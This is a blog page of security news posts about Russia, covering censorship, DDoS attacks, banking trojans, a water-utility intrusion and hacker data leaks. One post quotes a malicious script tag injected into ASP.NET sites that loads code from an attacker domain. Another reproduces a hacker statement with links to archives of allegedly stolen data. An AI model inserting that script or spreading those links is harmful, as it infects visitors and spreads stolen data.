Showing posts sorted by relevance for query Russia. Sort by date Show all posts
Showing posts sorted by relevance for query Russia. Sort by date Show all posts

Wikipedia Will Go Dark (Blackout) in Russia to Protest Censorship (Act for Information)

Wikipedia Will Go Dark (Blackout) in Russia to Protest Censorship (Act for Information)

All of us must know that near about six months ago Wikipedia goes offline or in other word Wikipedia gone dark (black out) globally for 24 hours, while showing a massive Web protest in the U.S. over the proposed anti-piracy laws SOPA and PIPA. Yet again it's stepping up again in a major Internet revolt against online censorship in Russia. According to sources the Russian government is currently exploring amendments to the “Act for information”. The proposed changes to the law could lead to sweeping censorship of the Internet, including the complete closure of Wikipedia in Russia
In addition to the proposed amendments to the "Act for Information," the government is also mulling over another bill that harkens back to the country's Soviet past with harsh censorship crackdowns. Under the draft bill, all Web sites that contain pornography or drug references, or that promote suicide or other "extremist ideas," will purportedly face blacklisting. These new laws come in the wake of an online uprising that happened before the inauguration of Russian President Vladimir Putin in May. During these protests, thousands of people took to writing on blogs and social networks demanding a new ballot after claims of rigged votes and electoral corruption during Putin's election.
Wikipedia posted a statement in Russian and asking for everyone’s help by sharing this link and spreading the word about what’s going on. The amendments are being read today and if they’re accepted then a date will be chosen that could in essence, wipe Wikipedia off of the Internet in Russia.

Message of Wikipedia to the World:- 
"Lobbyists and activists supporting the amendments, argue that they are directed exclusively against the content such as child pornography "and things like that," but to follow the provisions and wording to be discussed, will result in the creation of a Russian analogue of the "Great Chinese Firewall." The practice of law, which exists in Russia, says a high probability of worst-case scenario, in which access to Wikipedia was soon to be closed across the country."


-Source (Insider & Cnet)





SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Roman Andreev From Russia Won "Facebook Hacker Cup 2012"

Roman Andreev From Russia Won "Facebook Hacker Cup 2012"

Facebook officially declared "Facebook Hacker Cup 2012" - an annual worldwide programming competition where hackers compete against each other for fame, fortune, glory and a shot at the coveted Hacker Cup. Now its time for the conclusion and to announce the winner. The final round of Facebook Hacker Cup 2012 started yesterday at 10 AM at Facebook’s office in Menlo Park and lasted for three hours. The best of the best programmers from around the world competed by taking a stab at three separate problems. After a thrilling fight Roman Andreev from Russia won the Hacker Cup with a heavy and prestigious trophy and a check for $5,000. "Thousands competed, but only one can be the world champion. Big congrats to Roman from Russia, our new Hacker Cup Champion!" - declared by facebook on the official page of Hackers Cup. Tomek Czajka from the US & Tiancheng Lou from Chinaenlisted their names among the top three competitors from this year’s Hacker Cup. 

Here is a brief:- 
1st place: Roman Andreev from Russia, completed one problem correctly in 1 hr 4 min
2nd place: Tomek Czajka from the US, completed one problem correctly in 1 hr 5 min
3rd place: Tiancheng Lou from China, completed one problem correctly in 1 hr 44 min  

As expected Fcaebook promises to continue this event every year so keep your eye out for signups to open to be the Hacker Cup champ of 2013.



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Russia Is Facing Massive Cyber Attack (DDoS)


Russia is facing massive cyber attack. Hackers have shut down several Russian websites that provide independent election data, making state-controlled media one of the few widely accessible sources of information about today's parliamentary vote. The website of Golos.ru, the last remaining independent election-monitoring group based in Russia, was shut down early today. That group is partially financed by the European Commission. Also targeted were the websites of the Kremlin-critical Ekho Moskvy radio station, the "Moscow New Times," the weekly magazine "Bolshoi Gorod," and the news websites slon.ru and publicpost.ru.

"The attack on the website on election day is clearly an attempt to inhibit publication of information about violations," Moscow Echo editor-in-chief Alexei Venediktov wrote on Twitter.
Golos said it was the victim of a similar "distributed denial of service" (DDoS) attack, while several other opposition news sites were down. The Moscow Echo is popular among the liberal opposition although it is owned by state gas giant Gazprom. Golos said on Twitter that its main website as well as the website "Map of Violations" detailing claims of fraud across Russia were under "massive DDoS attacks". Golos head Liliya Shibanova said that the authorities seemed especially angry at their Map of Violations project, where people could upload any information or evidence of election violations.
"It's a very expensive operation," Shibanova said of the attacks. "It's a big organisation with plenty of means that must have done it."
She said the attack consisted of 50,000 hits per second by computers attempting to access the Golos website.



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

US & Russia "reset" their Cybersecurity Relationship


The United States and Russia have for several years been engaged in a high-level diplomatic “reset” of their relationship, complete with a physical "reset" button; now, that “reset” has been extended to the Internet.
The current goal of a better working relationship with Russia is much like the goal pursued by the US during the Cold War: making sure that the two countries did not misinterpret each others actions in such a way as to start an unnecessary conflict. While such relationships used to be about understanding troop movements or missile positioning, the two countries are now just as concerned with Internet actions.
"Both the US and Russia are committed to tackling common Cybersecurity threats while at the same time reducing the chances a misunderstood incident could negatively affect our relationship," said Howard Schmidt, US Cybersecurity Coordinator, in a statement yesterday.
We’re actively working on doing so in numerous ways: through regular exchanges of information on technical threats to both sides like botnets; by better understanding each other’s military views on operating in cyberspace; and by establishing 24/7 systems allowing us to communicate about cybersecurity issues via our existing and highly successful crisis prevention communications links between our two capitals. We plan to have all three mechanisms established by year’s end.
Such measures are increasingly important. The recent “International Strategy for Cyberspace," released by the US back in May, made clear that American officials would treat things like cyberattacks and Internet espionage the same way they would any offline threat. Indeed, an electronic attack could even bring the US military into action on behalf of an allied country.
"When warranted, the United States will respond to hostile acts in cyberspace as we would to any other threat to our country," said the document. "All states possess an inherent right to self-defence, and we recognize that certain hostile acts conducted through cyberspace could compel actions under the commitments we have with our military treaty partners We reserve the right to use all necessary means—diplomatic, informational, military, and economic—as appropriate and consistent with applicable international law, in order to defend our Nation, our allies, our partners, and our interests."
Given the difficulty of definitively identifying bad actors on the Internet and determining whether they are freelancers, organized crime, or foreign government agents, the possibilities for suspicion and misunderstanding remain high. The newest element of the US/Russian "reset" is meant to create some level of trust between officials on both sides.

To See the Statement of White House Click HERE 
To download the PDF of the International Strategy for Cyberspace Click HERE


-News Source (ars, white-house)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

SpyEye Banking Trojan Swallowing US, Russia & Ukraine -Said AhnLab

SpyEye Banking Trojan Swallowing US, Russia & Ukraine -Said AhnLab 

Researcher at AhnLab has figure out a significant majority of the domains and hosts for the SpyEye Banking Trojan are in the US. The malicious code has gained attention as of late for the threat it poses to online banking user information. According to SpyEye-relevant host data extracted by the AhnLab Packet Center, 48% of all SpyEye domains were found to be located in the US, followed by Russia at 7%, and the Ukraine at 6%. The AhnLab Packet Center is the company’s malicious packet analysis system, which assesses suspicious packet data, including that from SpyEye C&C servers. The findings indicate that the main targets of SpyEye are mainly in the US, and that North American financial institutions and users should remain especially vigilant.
Since its toolkit first became public in 2010, the SpyEye Trojan has produced many variants. According to analysis by the AhnLab Packet Center, the “10310” variant was identified as the most distributed version at 34.5%. The “10299” and “10290” variants followed at 14.7% and 14.6%, respectively. Additional variants are expected in the future. SpyEye, along with ZeuS, are notorious banking Trojans that have helped thieves steal more than $100 million around the world. Without an end-user PC solution, banks face great difficulty protecting individual customers from the sophisticated threats posed by these malicious codes. AOS ensures comprehensive transaction security with its Anti-keylogger, Firewall and Anti-virus/spyware agents for individual user PCs, as well as Secure Browser which creates an independent online space for safe communication. With AOS’ unique approach to transaction security, banks are able to deliver complete peace of mind to their online customers.

The four components of the AhnLab Online Security (AOS) solution, designed to protect the entire transaction process, include:-
  • AOS Secure Browser: Provides a dedicated security browser that creates an independent and protected environment for online transactions. It secures user banking data against Man-In-The-Browser (MITB) attacks such as SpyEye and ZeuS, memory hacking, webpage alteration, HTML injection, cross-site scripting (XSS), browser help object (BHO) hacking, screen capturing, debugging, and reverse engineering.
  • AOS Anti-keylogger: Delivers the protection needed to keep account information safe and prevent theft of personal banking data during input via a keyboard.
  • AOS Firewall: Protects the user by detecting and blocking unauthorized intrusions and hacking attempts and preventing the leakage of personal information.
  • AOS Anti-virus/spyware: Secures online transactions against the latest malicious codes with AhnLab’s cloud based security technology known as ASD (AhnLab Smart Defense).
Yesterday we have discussed that Microsoft’s Digital Crimes Unit coordinated with several financial services organizations and the United States seized the two command-and-control servers of Zeus


-Source (Market-Watch)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

U.S. Water Supply System Under Cyber Attack, FBI & DHS is Investigating


Hackers from Russia have has allegedly remotely intruded into the industrial control systems of a hydroelectric power plant in the US state of Illinois. Reports in the US media say that the hacker managed to repeatedly switch the pump on and off, destroying it in the process. This would be the first time that parts of a country's critical infrastructure have been successfully attacked and crippled via the internet.
Although the FBI and DHS started to investigate the incident, they initially downplayed the risk – this provoked the alleged hacker, "prof", who proceeded to intrude into a second water utility in Houston, Texas. To prove his intrusion, he released five screenshots of the utility's SCADA (Supervisory Control And Data Acquisition) system. 

After an investigation it was determined the system had been hacked into from a computer in Russia, the Washington Post reports.
An Illinois state fusion centre report on the attack said it is not known how many other systems might be affected.
The Department of Homeland Security confirmed that a water plant in Springfield, Illinois, had been damaged. He said: 'DHS and the FBI are gathering facts surrounding the report of a water pump failure in Springfield, Illinois.
'At this time there is no credible corroborated data that indicates a risk to critical infrastructure entities or a threat to public safety.'
A report from the Illinois terrorism and intelligence center said there had been problems with the system in Springfield for two to three months.
The system 'would power on and off, resulting in the burnout of a water pump,' the report said.
It added that cyber attackers broke into a software company’s database and got hold of user names and passwords of various control systems that run water plant computer equipment. The method used, hacking a security company to gain entry to another company, was employed earlier this year by cyber attackers in China.
They stole data from RSA, a division of EMC that provides secure remote computer access to government agencies. They then went on to get into the computer systems of companies, including Lockheed Martin.



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Europol says internet main tool for organised crime



The Internet has become a major tool in European organised crime, which uses it for drugs and human trafficking and money laundering as well as cybercrime, Europol's top official said Wednesday.
There has been a marked increase over the last two years in criminal groups turning to the Web to commit crimes regarded as "more traditional" rather than purely computer-based crime, Europol director Rob Wainwright said.
"Using the Internet has become much more mainstream," Wainwright said at the release of the policing body's bi-annual organised crime threat assessment (OCTA).
"It has now become the principle facilitator for organised crime."
The OCTA report said: "In addition to the high-tech crimes of cybercrime -- payment card fraud, the distribution of child abuse material and audio visual piracy -- extensive use of the Internet now also underpins illicit drug synthesis, extraction and distribution."
The Web was also extensively used to recruit human trafficking victims, facilitate illegal immigration, supply counterfeit commodities and traffick in endangered species, the report said.
"It was also widely used as a secure communication and money laundering tool by criminals," it added.
Organised crime groups derived more than 1.5 billion euros from payment card fraud in the EU, the report estimated.
Europol's 37-page report looked at the development of organised crime over the last 24 months.
Organised criminal groups were crossing national, ethnic and business lines more than ever, it said.
The financial crisis and the fFinancial constraints it caused had made people "more likely to be recruited by criminal groups for example drug couriers or 'money mules'."
Criminal activity was located around five key hubs, the report added.
The Netherlands and Belgium was the main co-ordination centre for drug distribution in Europe.
The Baltic states of Lithuania, Estonia, Latvia -- and Kaliningrad in Russia -- were the main points for the transit of illicit goods from Russia and home to violent groups with international reach.
Spain and Portugal remained a transit point for cocaine and cannabis resin and for human trafficking.
Bulgaria, Romania and Greece had seen the greatest expansion as a result of increased trafficking via the Black Sea illicit commodities and an significant increase in illegal immigration.
Finally southern Italy remained a centre for counterfeit currency and commodities as well as a centre for human trafficking.
The report, which will go to justice and home affairs ministries around the EU, will help governments set crime-fighting priorities for the next two years, Wainwright said.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

TrueConf 3D Video Conferencing Software



Russian Video Conferencing developer TrueConf LLC (formerly known as VideoPort) is pleased to announce the launch of their new hardware and software suite, TrueConf 3D - the first 3D video conferencing software solution to be launched in Russia. Making use of specialized cameras, TrueConf 3D allows for live stereo imaging and simultaneous transmission of three-dimensional media across networks, revolutionizing the virtual meeting. TrueConf LLC's specialist technicians are excited to announce that TrueConf 3D is in its beta-testing phase, and is scheduled to be available to corporate clients and interested parties by the end of 2011.
Moscow, Russia (PRWEB) May 16, 2011
The creation of a 3D video conferencing software system opens up a world of new opportunities for businesses, corporate entities and individuals who require virtual meeting capabilities to communicate across distances. TrueConf 3D is made possible by the integration of stereo imaging and playback into a single management unit. The unique feature of the TrueConf 3D system is the automatic scene recognition technology, which allows for the automatic selection of the shooting method on parallel or convergent axes, and which allows for their combination into a single 3D image.
The TrueConf 3D video complex includes:
A stereo camera with a module for recording images in 3D format
A client application for transmission of stereo data
A monitor with a sweep of 120Hz, reproducing the images at doubled frequency
NVIDIA 3D vision active shutter glasses

Besides this, the client application and the TrueConf 3D hardware also support all existing 3D imaging systems which use glasses.
TrueConf video conferencing software has been in development since 2007. Ivan Meleshko, head of the TrueConf research department, has been leading the investigation of the applicability of this technology. "We are monitoring the 3D equipment market. While creating our own 3D communication solution, we had to study stereoscopic data compression peculiarities and find the correct way to automatically capture 3D content in video conferencing. Our next step in the development of TrueConf will be the creation of auto-stereoscopic systems that do not require glasses."
Mikhail Gotalsky, TrueConf LLC's commercial director, has good news about the cost of such systems. "At the moment, it costs about $5000 to equip one workplace with a 3D video communication system. However, the prices for 3D monitors will soon fall, so video conferencing will become more accessible for corporate use... and which provides communication as close as possible to the real one."
NVIDIA 3D technologies have, in and of themselves, become a fixture of the telecommunications market. Alexey Lagunenko, head of the NVIDIA Sales Department in Eastern Europe, says: "Over the last several years, NVIDIA 3D technologies have become an inseparable part of the entertainment industry. Today they are being actively implemented into the B2B sphere."
About TrueConf LLC
TrueConf LLC's latest video conferencing technologies make it possible to communicate with your colleagues and partners via a virtual meeting, video call, video lecture or virtual conference from almost any part of the world. The use of stereoscopic technologies makes remote communication more immersive and realistic across distances, creating a more lively and engaging session for all users.

To learn more about TrueConf video conferencing software, please visit: http://trueconf.com/videoconferencing-products/

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

"Project Blackstar" Team Ghostshell Leaks 2.5 Million Records From Russian Govt & Individual

"Project Blackstar" Team Ghostshell Leaks 2.5 Million Records From Russian Govt & Individual 

A hacker group calling them selves "Team Ghostshell" who was recently behind the attack several top universities called an open operation declaring war on Russia's cyberspace. The operation is dubbed “Project Blackstar”. In the first phase of the operation  the hacking collective Team Ghostshell posted approximately 2.5 million accounts/records leaked, from governmental, educational, academical, political, law enforcement, telecom, research institutes, medical facilities, large corporations (both national and international branches) in such fields as energy, petroleum, banks, dealerships and many more. The hacker group also claimed to have access "to more russian files than the FSB and we are very much  eager to prove it." - said Ghostshell. The rest of the Pastebin post goes on to call out the Russian government and is littered with references to corruption, capitalism and social injustice. Judging by some of the records released, the Russian Police, along with Novatek, Russia's largest independent natural gas producer, the Alfa Group, an investment consortium and JINR, the country’s Joint Institute for Nuclear Research, all appear to have been implicated in the alleged leak. Some records appear to include individuals’ usernames and passwords while other documents almost read like resumes, complete with individuals’ names, IP addresses, education and job history.
Above I have discussed the last hack by Team Ghostshell where they had published 120,000 records from some of the world’s top universities. That leak, dubbed “Project WestWind,” sought to “raise awareness towards the changes made in today’s education,“ spilling student and faculty email addresses, passwords and IDs. Now this “Project Blackstar” with a leak of 2.5 million records from several Russian cyber space,  again arising a big doubt, that how much secure our cyber world is? 



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Cyber Fraud -A Russian Get Busted in U.S. & Have To Face 142 Years Of Imprisonment

Cyber Fraud -A Russian Get Busted in U.S. & Have To Face 142 Years Of Imprisonment  
Yet Again another cyber fraud issue. Here the suspect is Vladimir Zdorovenin of Russia, who was charged in the United States with cyber fraud, hacking into bank accounts and defrauding U.S. citizens of hundreds of thousands of dollars. According to the Russian Legal Information Agency Zdorovenin agreed to plead guilty of criminal conspiracy and online fraud. Meanwhile, he denies having committed other crimes. Zdorovenin was detained in Zurich on March 27 upon U.S. prosecutors' request. He was extradited to New York and charged on eight counts, including hacking into U.S. bank accounts, stealing personal client data and defrauding clients of "hundreds of thousands of dollars." 
A criminal case against Zdorovenin and his son Kirill was initiated in 2007. Kirill's whereabouts are unknown. Southern District attorney Preet Bharara maintains that the two men committed fraud as of 2005 from Russia via bogus websites. The prosecution maintains it has evidence, including outdoor surveillance, and e-mails and testimonies from an informer whose name will not be disclosed. The court will hold the next hearing on May 21. Zdorovenin faces up to 142 years in prison. The Foreign Ministry has stated that Zdorovenin's case is yet another attempt by the United States to enforce U.S. legislation on Russian citizens.

-Source (RAPSI News)



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

3 Russian Cyber Criminal Who Was The Master Mind of Banking Trojan 'Gozi' Charged in New York

3 Russian Cyber Criminal Who Was The Master Mind of Banking Trojan 'Gozi' Charged in New York 

Yet again another serious issue of cyber crime get resolved when the FBI tracked and figured out the master mind of infamous 'Gozi banking Trojan' which effected more than millions of system world wide, including a handful at NASA, leading to tens of millions of dollars in lost banking funds and damages to computer systems and networks. Three alleged international cyber criminals from Russia, responsible for creating and distributing 'Gozi' that infected over one million computers and caused tens of millions of dollars in losses charged in Manhattan Federal Court. Mihai Ionut Paunescu aged 28, a Romanian, Deniss Calovskis, 27, a Latvian, and Nikita Vladimirovich Kuzmin, 25, of the Russian Federation, are charged with computer intrusion, conspiracy to commit bank and wire fraud and access device fraud. Federal authorities said the three were arrested last week; Kuzmin is being held in New York, while Paunescu is in custody in Romania and Calovskis in Latvia. 
According to the press release of FBI -Deniss Calovskis, a/k/a “Miami,” a Latvian national who allegedly wrote some of the computer code that made the Gozi virus so effective, was arrested in Latvia in November 2012. Mihai Ionut Paunescu, a/k/a “Virus,” a Romanian national who allegedly ran a “bulletproof hosting” service that enabled cyber criminals to distribute the Gozi virus, the Zeus trojan, and other notorious malware and to conduct other sophisticated cyber crimes, was arrested in Romania in December 2012. 

The cases are being handled by the Complex Frauds Unit of the United States Attorney’s Office. Assistant United States Attorneys Sarah Lai, Nicole Friedlander, and Thomas G.A. Brown, along with Trial Attorney Carol Sipperly of the Computer Crime and Intellectual Property Section of the Department of Justice on the Paunescu case, are in charge of the prosecution. The charges contained in the Indictments are merely accusations, and the defendants are presumed innocent unless and until proven guilty.

DefendantAge and ResidenceChargesMaximum Penalty
Nikita Kuzmin25; Moscow, RussiaConspiracy to commit bank fraud; bank fraud; conspiracy to commit access device fraud; access device fraud; conspiracy to commit computer intrusion; computer intrusion95 years in prison
Deniss Calovskis27; Riga, LatviaConspiracy to commit bank fraud; conspiracy to commit access device fraud; conspiracy to commit computer intrusion; conspiracy to commit wire fraud; conspiracy to commit aggravated identity theft67 years in prison
Mihai Ionut Paunescu28; Bucharest, RomaniaConspiracy to commit computer intrusion; conspiracy to commit bank fraud; conspiracy to commit wire fraud60 years in prison


Brief About Gozi:-
The Gozi virus is malicious computer code, or “malware,” that steals personal bank account information, including usernames and passwords, from the users of affected computers. It was named by private sector information security experts in the U.S. who, in 2007, discovered that previously unrecognized malware was stealing personal bank account information from computers across Europe on a vast scale, while remaining virtually undetectable in the computers it infected. To date, the Gozi virus has infected over one million victim computers worldwide, among them at least 40,000 computers in the U.S., including computers belonging to the National Aeronautics and Space Administration (NASA), as well as computers in Germany, Great Britain, Poland, France, Finland, Italy, Turkey, and elsewhere, and it has caused tens of millions of dollars in losses to the individuals, businesses, and government entities whose computers were infected.

The Gozi virus was distributed to victims’ computers in several different ways. In one method, the virus was disguised as an apparently benign .pdf document which, when opened, secretly installed the Gozi virus on the victim’s computer. Once installed, the Gozi virus—which was intentionally designed to be undetectable by anti-virus software—collected data from the infected computer in order to capture personal bank account information including usernames and passwords. That data was then transmitted to various computer servers controlled by the cyber criminals who used the Gozi virus. These cyber criminals then used the personal bank account information to transfer funds out of the victims’ bank accounts and ultimately into their own personal possession.


For Detailed Information Click Here


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

"The World Tomorrow" - Wikileaks Founder Julian Assange TV Show

"The World Tomorrow" - Wikileaks Founder Julian Assange TV Show
Do you want to catch Wikileaks founder Julian Assange, if the answer is yes then a golden opportunity is coming for you. In a CNN report it has been come to light that Julian Assange plans to debut a talk show, "The World Tomorrow," on Russia's state-funded television network next week. Assange and RT, an English-language international satellite news channel, would not release the guest lineup in advance, but hinted that the first interview would be controversial. WikiLeaks has asked followers on Twitter if they can guess the show's first guest. "Any bets on who The World Tomorrow's first mystery guest(s) are?" it tweeted.
"You've been waiting and we've been teasing," said RT's website of the show, which will also be released online. The talk show set for launch Tuesday is creating a stir in global media circles. Commentators outside Russia have questioned the apparent link the show creates between Assange and the Kremlin, given RT's government-funded status.
It is unclear how or from where Assange, who is under house arrest in the United Kingdom while fighting extradition to Sweden, will present the show. Assange, in the online trailer, says that the experience of interviewing guests -- described by RT as opinion formers, some of them dissidents -- while under house arrest brings a different dimension to the process. "RT is rallying a global audience of open-minded people who question what they see in mainstream media and we are proud to premiere Julian Assange's new project," Editor-in-Chief Margarita Simonyan said in a statement on the television network's website.
"We provided Julian a platform to reach the world and gave him total editorial freedom. He is absolutely the right person to bring alternative opinions to our viewers around the globe." "The World Tomorrow" will be broadcast [simultaneously] on three RT channels, in English, Arabic and Spanish.
The WikiLeaks website for "The World Tomorrow" said Friday there would be 12 shows in total, each featuring a 26-minute edited interview. "RT is the first broadcast licensee of the show, but has not been involved in the production process. All editorial decisions have been made by Julian Assange," the website said. 
Last two big bang from Wikileaks was Spy Files where he said that Govt is using Malware For Surveillance.  Spy Files—includes confidential brochures and slide presentations that companies use to market intrusive surveillance tools to governments and law enforcement agencies. The documents published by Wikileaks include 287 files that describe products from 160 companies. Few months ago Wikileaks released 5 Million emails from Stratfor Global Intelligence, which was named GI Files (Global Intelligence Files) 





SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Mass ASP.NET Infection Ongoing, So Far 614,000 Web-Pages Affected


An infection that causes poorly configured websites to silently bombard visitors with malware attacks has hit almost 614,000 webpages, Google searches show.
The mass infection, which redirects users to a site exploiting old versions of Oracle's Java, Adobe's Flash player and various browsers, was first disclosed by Armorize on Wednesday. At the time, it appeared to affect about 180,000 pages. 


By time of writing on Friday, the initial attack and a follow-on exploit has spread to 613,890 combined pages. The SQL injection attack mostly exploits websites running Microsoft's ASP.Net web application framework.
The infection injects code into websites operated by restaurants, hospitals, and other small businesses and plants an invisible link in visitors' browsers to sites including jjghui.com and nbnjkl.com. Those sites in turn redirected to several other websites that include highly obfuscated code. At the end of the line is a cocktail of attacks that exploit known vulnerabilities in Java and the other targeted programs. Computers running unpatched versions are then commandeered. Servers in the attack used IP addresses based in the US and Russia.

To Download the Script Click Here 

The scripts causes the visiting browser to load an iframe first from www3.strongdefenseiz.in and then from www2.safetosecurity.rr.nu. Multiple browser-based drive-by download exploits are served depending on the visiting browser. In a drive-by download attack, visitors who navigate to the infected websites will be installed with malware on their machines without their knowledge. This is if they have outdated browsing platforms (browser or Adobe PDF or Adobe Flash or Java etc).
This wave of mass injection incident is targeting ASP ASP.NET websites. Currently, the 6 out of 43 antivirus vendors on VirusTotal can detect the dropped malware.

ASP and ASP.NET websites are injected with the following script (Text is Here):
<script src=http://jjghui.com/urchin.js></script>
 
 



-News Source (The Register & Armorize Blog)



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

CNAIPIC Hacked & More 8Gb Data Leaked (#Antisec)

National Anti-Crime Computer Centre for Critical Infrastructure Protection hacked By Anonymous and Lulzsec community.


The Official Statement Of the Hackers are:-


"...
////////////////////////////////////////////////////////////////////////////////////////////
+Legion of Anonymous Doom+ Release Zero1+
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Heynow,
This is a prerelease of a series we are going to make to reveal the biggest in history of European LE cyber operation Evidence exploitation and abuse. Thing's gonna get published and twittered all over anonymous and lulzsec community.

 Today we were granted with the Italian law enforcement Pandora box, we really think it shall be a new era of “regreaissance” to the almighty Homeland Security Cyber Operation Unit in EU.
So we decided to leak everything they got since they were established as a full scale cyber taskforce named CNAIPIC.

 This corrupted organization gathered all the evidence from the seized property of suspected computer professional entertainers and utilized it over many years to conduct illegal operations with foreign intelligence agencies and oligarchy to facilitate their lust for power and money, they never used obtained evidence to really support ongoing investigations.

 Today we reveal a whole Load of stuff (estimated leak would be over 8Gb) from such owned institutions, just to make it clear all of this stuff was stored on CNAIPIC evidence servers for years while people are doing time in jail waiting for the trial while CNAIPIC used the evidence in the global spy game galore:
  Egypt: Ministry of Transport and Communication
  Australia: Ministry of Defence
  Russia: Atomstroyexport, Diaskan, Sibneft, Gazprom etc.
  Ukraine: several embassies and consulates on it’s territory
  Nepal: Ministry of Foreign Affairs
  Belarus: Ministry of Foreign Affairs, Belneftehim, Belspetzexport
  Gibraltar, Cyprus, Cayman Islands etc: Tecno Develp, Line Holdings,    Dugsberry Inc, Alpha Prime, Alpha Minerals etc.
Vietnam: PetroVietnam (PTSC), Ministry of Natural Resources (MONRE)
  USA: EXXON MOBIL, US Department of agriculture and hundreds of attorneys and DOJ accounts including: McCallion & Associates LLP, Goodkind, Labaton, Rudoff & Sucharow, LLP, and hundreds of bullshit agencies we don’t even know why we pay taxes to support all of them.

 So to cut the crap let’s get it over with fellaz…

http://imgur.com/a/tkFdY#UTByw  
Is the image preview to get a glimpse on what is meant to be said.

http://depositfiles.com/files/tm7zeqiq9 
first of 2 preview archives with preview documents to get a general idea.

http://depositfiles.com/files/nn6dbleyv
2nd preview archive

http://www.sendspace.com/file/ta62tk  
CNAIPIC file structure and listing Part 1


Thank you all,
Stay tuned...4 update on this one.
NKWT LOAD  .."

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Chinese Hackers Eavesdropping European Diplomats Before G20 Summit

Researchers At FireEye Found -Chinese Hackers Snitching  Europeans Before G20 Summit 
Story of cyber espionage by Chinese hackers used to remain one of most highest pick of breakneck. Yet again another breathtaking issue of  eavesdropping by Chinese hackers get spot light, when  California-based renounced computer security firm FireEye Inc have figured out that a group of Chinese hackers eavesdropped on the computers of five European foreign ministries before last September's G20 Summit, which was dominated by the Syrian crisis. From the detailed analysis we came to know that the hackers have infiltrated the ministries' computer networks by sending emails to staff containing tainted files with titles such as "US_military_options_in_Syria," which sells virus fighting technology to companies. Whenever the targeted recipients opened those documents, they loaded malicious code on to their personal computers. Researchers of FireEye said that they were able to monitor the "inner workings" of the main computer server used by the hackers to conduct their reconnaissance and move across compromised systems for about a week in the late August. But suddenly they lost access to the hackers after they moved to another server shortly before the G20 Summit in St. Petersburg, Russia
Though the company has declined in open press to identify the nations whose ministries were hacked, although it said they were all members of the European Union. But FireEye informed the FBI about the whole issue in details. FireEye also confirmed that the hackers where from China, but they did not find evidence which may link those hackers to the Chinese government. Not surprisingly and obviously like earlier the Chinese government has distanced itself from any claim that it might have hacked foreign governments for data. FireEye also successfully monitor several dozen hacking groups operating in China, most of which they suspect of having ties to the government. The firms also suspect the hacking groups of stealing intellectual property for commercial gain. The researchers had been following the hackers behind the Syria-related attack for several years, but this is the first time the group's activities have been publicly documented. The company calls the group "Ke3chang," after the name of one of the files it uses in one of its pieces of malicious software"The theme of the attacks was U.S. military intervention in Syria," said FireEye researcher Nart Villeneuv. 
On reaction Chinese Foreign Ministry spokesman Hong Lei said- "U.S. internet companies are keen on hyping up the so-called hacker threat from China, but they never obtain irrefutable proof, and what so-called evidence they do get is widely doubted by experts. This is neither professional nor responsible," 
While talking in this story of Chinese eavesdropping, I also want to dig some points from decent parts where we all became very habituated of seeing Europe & U.S. countries blaming China for engaging cyber attacks; and China also do the same for accusing U.S. like vice versa. I am reviving your memories of last few years where If you look at the story of major cyber attacks of this year we will find that the name of China has been involved several times for engaging cyber attacks against several high profile websites and organization of U.S. including New York TimesTwitterNBC and so on. And if you refresh our memory then then we will find the scenario of big cyber attack and espionage by Chinese hackers have been spotted several times. In 2012 Chinese hackers had  breached Telvent's corporate network & gained control of US Power Grid. Also in the middle of last year, we have seen that Chinese hackers have broken into Indian Navy's Computer System & stolen sensitive data. Few months before this hack, Tokyo based computer security firm Trend Micro confirmed that Chinese hackers were responsible for biggest cyber-espionage in India, Japan & Tibet. Also the director of National Security Agency (NSA) General Keith Alexander confirmed that hackers from China was responsible for the serious attack on one of the leading IT security & cyber security company RSA. Also in 2011 China was responsible behind the attack on US Chamber of CommerceSatellite System of U.SNortel Network & so on.  But few days ago National Computer Network Emergency Response Coordination Center of China (CNCERT/CC), China's primary computer security monitoring network claimed that China fallen victim of one of biggest cyber attacks originated from US, Japan & South Korea. We must have to say that this statement is truly irrelevant. Cyber crime investigator have found that China was directly responsible for the hack into Japan's Biggest Defense Contractor MitsubishiJapan Aerospace Exploration Agency (JAXA) & Parliament of Japan. In case of South Korea  more than 13 Million of MapleStory players data has been stolen, there also hackers from China was responsible.  

Before I conclude, I request you to closely look at the above mentioned stories, you will find China majorly responsible for eavesdropping & security breach. On the same side China also been effected by the same way. So in conclusion, we cant put a full stop in this chain of cyber attacks, hackingeavesdropping, as it comes from both end. So this exciting episode will be continued like it does. If you want to stay updated then don't forget to stay tuned with VOGH



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Threat of cyber attacks growing


South Africa is a potential target of cyber attacks and the threat is growing, a security analyst said on Tuesday in Sandton during the ITWeb Security Summit.

Anthony Olivier said cybercrime was getting more sophisticated with increased risk of attacks risk of attacks and that the business community must invest more in data protection.

“Information security is not just about business – it’s an undercover war. What’s relevant in South Africa is that there’s a fight for resources,” said Olivier.

He said that with South Africa now a member of the bloc of emerging economies, Brics, cyber security is now of paramount importance.

“The fact we’ve been invited to Brics is being seen that South Africa is key to the national interests of large superpowers, and this has an impact on cyber security,” he said.

The security expert said the country was now entering a dangerous cybercrime environment and organisations needed to recognise the importance of information security and consequently take a risk-based approach.

South Africa’s entrance into the four member block of Brazil, India, Russia and China wouldnow expose local businesses to increased risks.

Consulting firm Deloitte’s latest cybercrime report reveals that the growth of this threat has outpaced that of other cyber security threats. In many cases, organisations don’t even know when their valuable information had been stolen.

According to Deloitte, data was more valuable than money.

